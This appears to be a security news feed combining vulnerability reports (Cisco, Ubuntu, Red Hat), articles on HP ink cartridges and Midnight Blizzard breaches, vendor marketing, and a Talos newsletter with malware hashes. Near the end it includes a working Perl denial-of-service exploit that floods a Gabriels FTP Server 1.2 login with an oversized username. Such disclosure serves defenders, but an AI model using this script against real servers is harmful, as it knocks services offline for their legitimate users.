**According to the CVSS metric, the attack complexity is high (AC:H). What does that mean for this vulnerability?**

Successful exploitation of this vulnerability requires an attacker to take additional actions prior to exploitation to prepare the target environment.

CVE-2024-21336: Microsoft Edge (Chromium-based) Spoofing Vulnerability

Cisco has released patches to address a critical security flaw impacting Unified Communications and Contact Center Solutions products that could permit an unauthenticated, remote attacker to execute arbitrary code on an affected device.
Tracked as CVE-2024-20253 (CVSS score: 9.9), the issue stems from improper processing of user-provided data that a threat actor could abuse to send a

Network Security / Vulnerability

Cisco has released patches to address a critical security flaw impacting Unified Communications and Contact Center Solutions products that could permit an unauthenticated, remote attacker to execute arbitrary code on an affected device.

Tracked as **CVE-2024-20253** (CVSS score: 9.9), the issue stems from improper processing of user-provided data that a threat actor could abuse to send a specially crafted message to a listening port of a susceptible appliance.

"A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the privileges of the web services user," Cisco said in an advisory. "With access to the underlying operating system, the attacker could also establish root access on the affected device."

Synacktiv security researcher Julien Egloff has been credited with discovering and reporting CVE-2024-20253. The following products are impacted by the flaw -

*   Unified Communications Manager (versions 11.5, 12.5(1), and 14)
*   Unified Communications Manager IM & Presence Service (versions 11.5(1), 12.5(1), and 14)
*   Unified Communications Manager Session Management Edition (versions 11.5, 12.5(1), and 14)
*   Unified Contact Center Express (versions 12.0 and earlier and 12.5(1))
*   Unity Connection (versions 11.5(1), 12.5(1), and 14), and
*   Virtualized Voice Browser (versions 12.0 and earlier, 12.5(1), and 12.5(2))

While there are no workarounds that address the shortcoming, the networking equipment maker is urging users to set up access control lists to limit access where applying the updates is not immediately possible.

"Establish access control lists (ACLs) on intermediary devices that separate the Cisco Unified Communications or Cisco Contact Center Solutions cluster from users and the rest of the network to allow access only to the ports of deployed services," the company said.

The disclosure arrives weeks after Cisco shipped fixes for a critical security flaw impacting Unity Connection (CVE-2024-20272, CVSS score: 7.3) that could permit an adversary to execute arbitrary commands on the underlying system.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Critical Cisco Flaw Lets Hackers Remotely Take Over Unified Comms Systems

By Deeba Ahmed
HP CEO Enrique Lores defended HP's practice of bricking printers when loaded with third-party ink.
This is a post from HackRead.com Read the original post: HP Claims Monopoly on Ink, Alleges 3rd-Party Cartridge Malware Risk

The company now claims that allowing third-party ink cartridges in its printers would expose them to viruses and malware.

Hewlett-Packard (HP) claims to have laptops that effectively block unwelcome snoopers, but why does the company maintain a monopoly over its ink cartridges? Well, HP is reaffirming its monopoly on refillable ink cartridges for printers following a lawsuit for blocking third-party ink with Dynamic Security updates.

The company claims that third-party cartridges can infect users’ PCs with viruses or malware, which can then reach the printer and network. In an interview with CNBC, HP CEO Enrique Lores defended HP’s practice of bricking printers when loaded with third-party ink, based on the company’s 2022 research.  It suggests ink cartridge microcontroller chips could be a cyber threat.

The company tasked Bugcrowd researchers to determine it under its bug bounty program in 2022 and learned that HP’s cartridges, which typically use a secure chip for communication with printers, could contain malicious software if sold by third parties.

HP’s chief technologist of print security, Shivaun Albright, stated back then that the hacker could inject code into the device beyond the bounds of the buffer. HP acknowledges that there is no evidence of in-the-wild exploitation of this hack, but given that the chips used in third-party ink cartridges are reprogrammable, they are indeed vulnerable.

However, Ars Technica Senior Security Editor Dan Goodin believes there are no known attacks that can infect printers using hacked ink cartridges. Goodin raised concerns about the potential use of ink cartridges as a cyber threat, but cybersecurity professionals were sceptical.

Hackread.com’s Founder and Editor, Waqas, dismisses the argument that third-party cartridges can compromise a printer with malware as weak and unconvincing. He draws a comparison, stating, “This reminds me of Kellyanne Elizabeth Conway, the Counselor to then-President Donald Trump, who quite convincingly claimed in an interview that she believes microwaves can be hacked and turned into cameras for spying purposes.”

However, Lores’ comments raise concerns about security vulnerabilities as he presented a scenario where a compromised ink cartridge could launch malware onto a connected network. HP claims its chips are secure, implying that its authentication mechanisms are reliable. Still, fearing infection from third-party cartridges may prevent some customers from purchasing ink from HP, despite HP’s claims of chip authenticity.

For your information, HP has been hit with a lawsuit over its Dynamic Security system (PDF), which stops printer operation if an ink cartridge without an HP chip or HP electronic circuitry is installed.

The lawsuit (PDF) seeks class-action certification, alleging that HP customers were not informed that firmware updates issued in late 2022 and early 2023 could result in printer features not working.

The lawsuit seeks monetary damages and an injunction to deter HP from issuing printer updates, which block ink cartridges without an HP chip as compromised ink cartridges can allow malware to invade the connected network.

Printer manufacturers like HP have faced criticism for security flaws, potentially allowing hackers to access sensitive data or control printing functions. Lores emphasized the need for stronger security measures in the printer industry.

“I think for us it is important for us to protect our IP. There is a lot of IP that we’ve built in the inks of the printers, in the printers themselves. And what we are doing is when we identify cartridges that are violating our IP, we stop the printers from work” Lores stated in an interview with CNBC.

****_RELATED ARTICLES_****

1.  HP Printer’s Hard Drive Can Be Used To Host Malicious Files
2.  Keylogger spotted – HP machines could turn into a spyware
3.  Lenovo removes backdoor in networking switches since 2004
4.  Hacker takes over thousands of Printers; sends alerts to users
5.  Researcher finds pre-installed keylogger in hundreds of HP laptops

HP Claims Monopoly on Ink, Alleges 3rd-Party Cartridge Malware Risk

Newly disclosed breaches of Microsoft and Hewlett-Packard Enterprise highlight the persistent threat posed by Midnight Blizzard, a notorious Russian cyber-espionage group.

Microsoft and Hewlett-Packard Enterprise (HPE) both recently disclosed that they suffered corporate email breaches at the hands of Russia's “Midnight Blizzard” hackers.

The group, which is tied to the Kremlin's SVR foreign intelligence, is specifically linked to SVR's APT 29 Cozy Bear, the gang that meddled in the United States 2016 presidential election, has conducted aggressive government and corporate espionage around the world for years, and was behind the infamous 2021 SolarWinds supply chain attack. While both HP's and Microsoft's breaches came to light within days of each other, the situation mainly illustrates the ongoing reality of Midnight Blizzard's international espionage activities and the lengths it will go to to find weaknesses in organizations' digital defenses.

“We shouldn't be surprised that Russian intelligence-backed threat actors, and SVR in particular, are targeting tech companies like Microsoft and HPE. With organizations that size, it would be a much bigger surprise to learn they weren't,” says Jake Williams, a former US National Security Agency hacker and current faculty member at the Institute for Applied Network Security.

HP Enterprise said in a US Securities and Exchange Commission submission posted on Wednesday that Midnight Blizzard gained access to its “cloud-based email environment” last year. The company first learned about the situation on December 12, 2023, but said that the attack began in May 2023. Hackers “accessed and exfiltrated data … from a small percentage of HPE mailboxes belonging to individuals in our cybersecurity, go-to-market, business segments, and other functions,” the company wrote in the SEC filing. HP Enterprise said the breach likely came about as the result of another incident, discovered in June 2023, in which Midnight Blizzard also accessed and exfiltrated company “SharePoint” files beginning as early as May 2023. SharePoint is a much-targeted cloud collaboration platform made by Microsoft that integrates with Microsoft 365.

“The accessed data is limited to information contained in the HPE users’ email boxes,” HP Enterprise spokesperson Adam Bauer told WIRED in a statement. “We continue to investigate and analyze these mailboxes to identify information that could have been accessed and will make appropriate notifications as required.”

Meanwhile, Microsoft said on Friday that it detected a system intrusion on January 12 tied to a November 2023 breach. The attackers targeted and compromised some historic Microsoft system test accounts that then allowed them to access “a very small percentage of Microsoft corporate email accounts, including members of our senior leadership team and employees in our cybersecurity, legal, and other functions.” From there the group was able to exfiltrate “some emails and attached documents.” Microsoft noted in its disclosure that the attackers appeared to be seeking information about Microsoft's investigations and knowledge of Midnight Blizzard itself.

“The attack was not the result of a vulnerability in Microsoft products or services. To date, there is no evidence that the threat actor had any access to customer environments, production systems, source code, or AI systems,” the company wrote in its disclosure. “This attack does highlight the continued risk posed to all organizations from well-resourced nation-state threat actors like Midnight Blizzard.”

In an August 2022 report from the threat intelligence firm Mandiant, incident response leader Doug Bienstock wrote that the firm “continues to identify APT29 operations targeting the United States' (US) interests, and those of NATO and partner countries.” He noted that even though the hacking group is widely known, it has continued to be “extremely prolific” and returns to target certain victims multiple times over months or even years. “This persistence and aggressiveness are indicative of sustained interest in this information and strict tasking by the Russian Government,” Bienstock wrote, adding, “Mandiant has observed APT29 continue to demonstrate exceptional operational security and advanced tactics targeting Microsoft 365.”

While Midnight Blizzard is far from a new threat, researchers point out that it's always productive to have renewed attention on the issue of persistent state-backed espionage. Williams, of the Institute for Applied Network Security, also highlights the hackers' counterintelligence goals in the recent Microsoft breach—that Midnight Blizzard appeared to be specifically interested in learning what company executives know about their group and methods.

"I'm not surprised that the threat actors were observed looking for what information Microsoft had on them,” Williams says. “But it's a great piece of evidence to remind us that threat actors are regularly monitoring our own investigative efforts as defenders.”

Big-Name Targets Push Midnight Blizzard Hacking Spree Back Into the Limelight

ThreatDown has earned 37/37 awards over nine consecutive quarters.

ThreatDown Endpoint Protection (EP) achieved the highest possible score (100%) and received certifications for Level 1, Exploit, Online Banking, and Ransomware in the most recent anti-malware efficacy assessment results for the Q3 2023 evaluation performed by MRG Effitas, a world leader in independent IT research.

These results mark the ninth time in a row ThreatDown has received all certification awards, and is now officially the only vendor to win every single certification and award from Q3 2021 through Q3 2023.

MRG Effitas assesses a product’s ability to meet today’s most pressing threats in-the-wild, such as stopping zero-day malware, ransomware, and exploits—and doing so with speedy performance and low false positives.

After unveiling their new phishing assessment in Q2 2023, MRG Effitas in Q3 2023 began awarding a full-on 360° Phishing Certification to vendors who could take down phishing threats.

ThreatDown blocked 100% of phishing attempts in the In-the-Wild (ITW) Phishing Test. In other words, ThreatDown is the only vendor to consistently receive all 4 award logos and block 100% of phishing attempts.

How we were able to do it: The signature and behavior-based detection techniques and proprietary anti-exploit technology of ThreatDown EP allowed it to detect and autoblock more malware than any other competitor on the Q3 test. In addition, the Web protection layer of our EP blocks access to and from known or suspicious Internet addresses, allowing us to ace the phishing tests.

As an integral foundation layer for ThreatDown Bundles, these results prove that ThreatDown provides reliable and comprehensive protection against a wide range of threats.

Let’s dive into where we prevented more than the rest and how we were able to do it.

**100% of phishing attempts blocked **

Given the frequency and risks associated with phishing attacks today, it’s clear that modern endpoint security needs to protect against these attacks.

According to Verizon, attackers used phishing for initial access in 15% of data breaches in 2022. CISA also showed that, within the first 10 minutes of receiving a phishing email, 84% of employees took the bait. After successfully compromising a system through phishing, threat actors can further their attacks by dropping ransomware or stealing sensitive data, leading to costly financial and reputational damages.

**ThreatDown blocked 100% of phishing attempts in the ITW Phishing Test and was only one of two vendors to score 80% or above in the Phishing Simulator Test.**

How we were able to do it: ThreatDown EP, the foundation for ThreatDown Bundles, features a Web protection layer that blocks access to and from known or suspicious Internet addresses.

**100% of ransomware blocked **

Using a blend of signature and signature-less technologies, the anti-ransomware layer of ThreatDown EP constantly monitors endpoint systems and automatically kills processes associated with ransomware activity.

MRG Effitas tested security products against 65 ransomware samples. In addition, they tested four ransomware simulator samples created in-house, ensuring the security product could only rely on its behavior scanning modules. To test for false positives, a device running ThreatDown EP also ran three benign programs designed to mimic ransomware behavior.

ThreatDown blocked 100 percent of ransomware threats in the MRG Effitas assessment and did so with no false positives, allowing the three benign programs to run. For this we earned the 360° Ransomware Certification.

**100% of banking malware blocked **

In 2021, 37% of banking malware attacks targeted corporate users. 

We were one of the few vendors who earned a 360° Online Banking Certification, which means ThreatDown EP stopped 100% of threats designed to steal financial information and money from victim’s accounts. To outperform the others, our unique detection technology again came into play.

ThreatDown EP blocked 100% of the 16 financial malware samples, the Magecart credit card-skimming attack, and Botnets designed to steal credentials.

**100% of zero-day threats blocked **

One of the many strong suits of our detection is that it can detect malware that has never been seen before, also called zero-day malware. Again, we were one of the only vendors to detect and block these pernicious threats, which account for 80% of successful breaches.  

Built on machine learning (ML) and behavioral analysis techniques, our behavior-based detection enabled ThreatDown EP to detect and block 100% of all zero-day threats. For this, as well as blocking all Botnets, we earned the 360° Level 1 Certification.

**100% of exploits blocked **

The anti-exploit feature of ThreatDown EP protects organizations from one of the most advanced cyber attacks: zero-day exploits targeting browser and application vulnerabilities.  

But don’t take our word for it: MRG Effitas used 8 different exploitation techniques to try and deliver a malicious payload on a device running ThreatDown EP—but they didn’t get very far. Malwarebytes earned the 360° Exploit Certification for autoblocking 100% of Exploit/Fileless attacks, entirely protecting the system from infection.  

We were one of the few to earn the 360° Exploit Certification all thanks to our proprietary anti-exploit technology, which wraps vulnerable programs in four defensive layers that prevent an exploit from installing its payload, or even executing initial shellcode. 

**Consistency is key **

If there is one shining take away from this accomplishment, it’s that consistency is key.

You don’t want a security solution that passes rigorous tests like MRG Effitas only some of the time. You want a solution that passes them with flying colors all of the time. Clearly, ThreatDown EP, and by extension our ThreatDown Bundles, is that solution.

For organizations that are concerned their current solution may not be up-to-par, the MRG Effitas assessment has demonstrated that ThreatDown—more consistently than anybody else—has what it takes to keep your business safe from today’s most pressing cyberthreats.

 Malwarebytes wins every MRG Effitas award for 2 years in a row 

Cyber insurance premiums are expected to rise this year after leveling out in 2023.

Thursday, January 25, 2024 14:00

I just bought an electric car last week, so I’ve been shopping for new car insurance policies that could offer me a discount for ditching gas. 

We’re all familiar with the boring process of entering the same information 10 times over into 10 different companies’ websites trying to see who comes out the cheapest and offers the best bundles, discounts or deals. 

Unfortunately, with cybersecurity insurance, there are no bundles or “Personal Price Plans” to enroll in, and costs are rising. 

This is nothing to say about whether an organization should get cyber insurance. That is 100 percent their decision to make, and every case is going to be different. But for companies who are interested in getting these types of policies to be best prepared to recover from and deal with a potential security incident, it’s now more expensive than ever to get cyber insurance. 

A report last week from Dark Reading indicated that cyber insurance costs are expected to rise over the next 12 to 24 months. This would be after premiums for these plans rose 50 percent in 2022, according to Bloomberg, though they largely held steady in 2023. 

This problem isn’t isolated to just the U.S., either. A November report from business continuity service Databarracks surveyed companies in the U.K. and found that nearly a third of respondents said their cyber insurance had increased in cost over the past year, while more companies than ever said they had any type of cyber insurance policy, implying a totally new line item for their budgets. 

This rising cost could certainly be attributed to all the classic factors of why anything gets more expensive: market demand, inflation, rising costs of doing business, etc. But an increase in ransomware activity seems to be a large driver, too. 

The same Databarracks survey found that 24 percent of all IT downtime for respondents was due to a cyber incident, up 14 percent from 2018. Thirty-seven percent of all companies said they experienced a ransomware attack in 2023, and more than half experienced some sort of security incident in general. 

As we saw in our most recent Talos Incident Response Quarterly Trends Report, ransomware may rise again after a relatively quiet period from mid-2022 through the summer of 2023. Ransomware, including pre-ransomware activity, was the top observed threat in the fourth quarter of 2023, accounting for 28 percent of engagements, according to Talos IR, a 17 percent increase from the previous quarter. 

That’s not to say that it’s a lock that ransomware attacks are going to be up in 2024, but if they are, cyber insurance policies are only going to get more expensive, which means further shifting budgets for companies of all sizes.  

There is no one-size-fits-all approach for how anyone should approach getting a cybersecurity insurance policy. Still, if companies can’t steady the cost of premiums, it may send executives shopping for other, potentially less effective, methods of preparing for a cyber attack. 

**The one big thing **

Cisco Talos Incident Response (Talos IR) saw a significant increase in ransomware activity in its engagements during the fourth quarter of 2023, while education remains one of the most targeted sectors. Talos IR also observed several brand new ransomware operations for the first time in Q4, including Play, Cactus, BlackSuit and NoEscape. The latest Talos IR Quarterly Trends Report has a full breakdown of the top threats they saw in the wild and an idea of where attacker tactics might be headed in 2024. 

**Why do I care? **

This was the first time in all of 2023 that the rate of ransomware attacks rose during IR engagements. Education and manufacturing were tied for the most targeted verticals, accounting for nearly 50 percent of the total number of incident response engagements, so those industries should note Talos IR’s findings. 

**So now what? **

The lack of MFA remains one of the biggest impediments to enterprise security and led to many of the attacks Talos IR saw in Q4. All organizations should implement some form of MFA, such as Cisco Duo. 

**Top security headlines of the week **

**One of the largest password dumps ever was posted last week to an online forum, seemingly containing more than 25 million login credentials that had never been leaked before.** In all, the collection includes 71 million unique credentials for a range of websites, including the online video game “Roblox,” Yahoo, Facebook and eBay. Though many of these credentials had already been leaked in the past, the user hosting the file claims they all came through an information-stealing malware that collected the usernames and passwords in plain text. Credentials that are stolen via data breaches often contain encrypted passwords. The operator behind the website Have I Been Pwned? first discovered the trove of data earlier this month, but it’s likely been in circulation in various online forums for at least four months. Each line in the dataset, which consists of images and plain text, includes a login URL, the associated account’s name and a password. (Ars Technica, Bleeping Computer) 

**A new report indicates that each Facebook user could be sharing their personal data with thousands of other companies.** The study, conducted by the non-profit Consumer Report, followed more than 700 volunteers’ Facebook accounts and found that, on average, each participant in the study had their data sent to Facebook by 2,230 companies. Some respondents had their data shared with more than 7,000 different companies, and in all, the study captured more than 180,000 organizations that shared data with Facebook. The study was specifically meant to capture “server-to-server” tracking, in which personal data goes from a company’s servers to Meta’s, the parent company of Facebook, servers. The more “traditional” form of tracking for Meta through pixels on other companies’ websites can easily be spotted in a web browser, while server-to-server cannot. The three companies that appeared the most often connected to participants’ accounts in the study were all data brokers, who presumably turned around and sold that data to additional companies for a profit. Consumer Reports listed multiple recommendations for Facebook to improve its data protection, including improving the transparency of Facebook’s data collection tools, making it easier for users to opt out of data sharing and asking the U.S. government to pass data minimization laws. (Consumer Reports, The Markup) 

**Apple released a series of security updates this week for its devices that fixed three vulnerabilities in the WebKit browser engine** that were already being exploited in the wild. One of the vulnerabilities, CVE-2024-23222, is believed to have been exploited in more recent versions of Apple’s mobile operating system iOS. An attacker could exploit this vulnerability to execute remote code on the targeted device. Two other vulnerabilities, CVE-2023-42916 and CVE-2023-42917, were likely exploited in version of iOS dating back to before 16.7.1. The U.S. Cybersecurity and Infrastructure Security Agency added CVE-2024-23222 to its Known Exploited Vulnerabilities (KEV) list. Apple released patches for all its devices, including the Apple TV streaming box, iPad and macOS desktop computers. (SecurityWeek, Computer Weekly) 

**Can’t get enough Talos? **

*   Talos Takes Ep. #169: What's new with CVSS 4.0, and does it really change anything? 
*   Best Practices for Handling Incident Response During a Merger and Acquisition 
*   Cisco Tech Beat Podcast: Talking Past, Current, and Future Cyber Threats with Nick Biasini 
*   Critical vulnerability in ManageEngine could lead to file creation, dozens of other vulnerabilities disclosed by Talos to start 2024 
*   Exploring malicious Windows drivers (Part 1): Introduction to the kernel and drivers 

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** e340aa9f08ce8128e17a3186053bfaf2dc119d98a64f7bc4d37fb7be03365c93   
**MD5:** 5800fc229e3a5f13b32d575fe91b8512   
**Typical Filename:** client32.exe   
**Claimed Product:** NetSupport Remote Control   
**Detection Name:** W32.Riskware:Variant.27dv.1201 

**SHA 256:** 1fa0222e5ae2b891fa9c2dad1f63a9b26901d825dc6d6b9dcc6258a985f4f9ab   
**MD5:** 4c648967aeac81b18b53a3cb357120f4   
**Typical Filename:** yypnexwqivdpvdeakbmmd.exe   
**Claimed Product:** N/A    
**Detection Name:** Win.Dropper.Scar::1201 

**SHA 256:** 581866eb9d50265b80bae4c49b04f033e2019797131e7697ca81ae267d1b4971   
**MD5:** 4c5fdfd4868ac91db8be52a9955649af   
**Typical Filename:** N/A   
**Claimed Product:** N/A   
**Detection Name:** W32.581866EB9D-100.SBX.TG 

**SHA 256:** 4c3c7be970a08dd59e87de24590b938045f14e693a43a83b81ce8531127eb440   
**MD5:** ef6ff172bf3e480f1d633a6c53f7a35e   
**Typical Filename:** iizbpyilb.bat   
**Claimed Product:** N/A    
**Detection Name:** Trojan.Agent.DDOH 

**SHA 256:** bea312ccbc8a912d4322b45ea64d69bb3add4d818fd1eb7723260b11d76a138a   
**MD5:** 200206279107f4a2bb1832e3fcd7d64c   
**Typical Filename:** lsgkozfm.bat   
**Claimed Product:** N/A   
**Detection Name:** Win.Dropper.Scar::tpd

Why is the cost of cyber insurance rising?

Ubuntu Security Notice 6598-1 - Fabian Bäumer, Marcus Brinkmann, Joerg Schwenk discovered that the SSH protocol was vulnerable to a prefix truncation attack. If a remote attacker was able to intercept SSH communications, extension negotiation messages could be truncated, possibly leading to certain algorithms and features being downgraded. This issue is known as the Terrapin attack. This update adds protocol extensions to mitigate this issue.

    ==========================================================================Ubuntu Security Notice USN-6598-1January 25, 2024paramiko vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.10- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:A protocol flaw was fixed in Paramiko.Software Description:- paramiko: Python SSH2 libraryDetails:Fabian Bäumer, Marcus Brinkmann, Jörg Schwenk discovered that the SSHprotocol was vulnerable to a prefix truncation attack. If a remote attackerwas able to intercept SSH communications, extension negotiation messagescould be truncated, possibly leading to certain algorithms and featuresbeing downgraded. This issue is known as the Terrapin attack. This updateadds protocol extensions to mitigate this issue.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.10:   python3-paramiko                2.12.0-2ubuntu1.23.10.2Ubuntu 22.04 LTS:   python3-paramiko                2.9.3-0ubuntu1.2Ubuntu 20.04 LTS:   python3-paramiko                2.6.0-2ubuntu0.3In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6598-1   CVE-2023-48795Package Information:   https://launchpad.net/ubuntu/+source/paramiko/2.12.0-2ubuntu1.23.10.2   https://launchpad.net/ubuntu/+source/paramiko/2.9.3-0ubuntu1.2   https://launchpad.net/ubuntu/+source/paramiko/2.6.0-2ubuntu0.3

Ubuntu Security Notice USN-6598-1

Ubuntu Security Notice 6597-1 - It was discovered that Puma incorrectly handled parsing chunked transfer encoding bodies. A remote attacker could possibly use this issue to cause Puma to consume resources, leading to a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6597-1January 25, 2024puma vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.10- Ubuntu 23.04Summary:Puma could be made to consume resources if it received specially craftednetwork traffic.Software Description:- puma: threaded HTTP 1.1 server for Ruby/Rack applicationsDetails:It was discovered that Puma incorrectly handled parsing chunked transferencoding bodies. A remote attacker could possibly use this issue to causePuma to consume resources, leading to a denial of service.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.10:   puma                            5.6.5-4ubuntu2.1Ubuntu 23.04:   puma                            5.6.5-3ubuntu1.2In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6597-1   CVE-2024-21647Package Information:   https://launchpad.net/ubuntu/+source/puma/5.6.5-4ubuntu2.1   https://launchpad.net/ubuntu/+source/puma/5.6.5-3ubuntu1.2

Ubuntu Security Notice USN-6597-1

Gabriels FTP Server version 1.2 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: Gabriels FTP Server 1.2 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 25 january 2024  
# Vendor Homepage:  N/A  
# Download to demo: https://drive.google.com/file/d/1k8QxfP6x908E-1QpRAVulKoAM9OEo1a8/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: Gabriels FTP Server 1.2  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=wwHuXfYS8yQ

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server does not correctly handle the amount of data or bytes of the USERNAME entered by the user.  
#When authenticating to the FTP server with a long USERNAME or a USERNAME with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

        print "[+] Exploiting... \n";

    my $payload = "\x41\x2C\x41\x20\x42"x500;

    my $ftp_socket = IO::Socket::INET->new(  
        PeerAddr => $ip,  
        PeerPort => $port,  
        Proto    => 'tcp',  
        Timeout => '10',  
    ) or die "Não foi possível se conectar ao servidor.";

    my $response = <$ftp_socket>;

    print $ftp_socket "USER $payload\r\n";

    print "[+] Done - Exploited success!!!!!\n\n";

     sub intro {  
      print "######################################################################\n";  
      print "#                Gabriels FTP Server 1.2 - Denied of Service         #\n";  
      print "#                                                                    #\n";  
      print "#                       Coded by Fernando Mengali                    #\n";  
      print "#                                                                    #\n";  
      print "#                 e-mail: fernando.mengalli\@gmail.com               #\n";  
      print "#                                                                    #\n";  
      print "######################################################################\n";  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

#3. Solution/ How to fix:

# This version product is deprecated

Gabriels FTP Server 1.2 Denial Of Service

Red Hat Security Advisory 2024-0399-03 - An update for gnutls is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0399.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: gnutls security updateAdvisory ID:        RHSA-2024:0399-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0399Issue date:         2024-01-24Revision:           03CVE Names:          CVE-2023-5981====================================================================Summary: An update for gnutls is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The gnutls packages provide the GNU Transport Layer Security (GnuTLS) library, which implements cryptographic algorithms and protocols such as SSL, TLS, and DTLS.Security Fix(es):* gnutls: timing side-channel in the RSA-PSK authentication (CVE-2023-5981)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-5981References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2248445

Tag

#vulnerability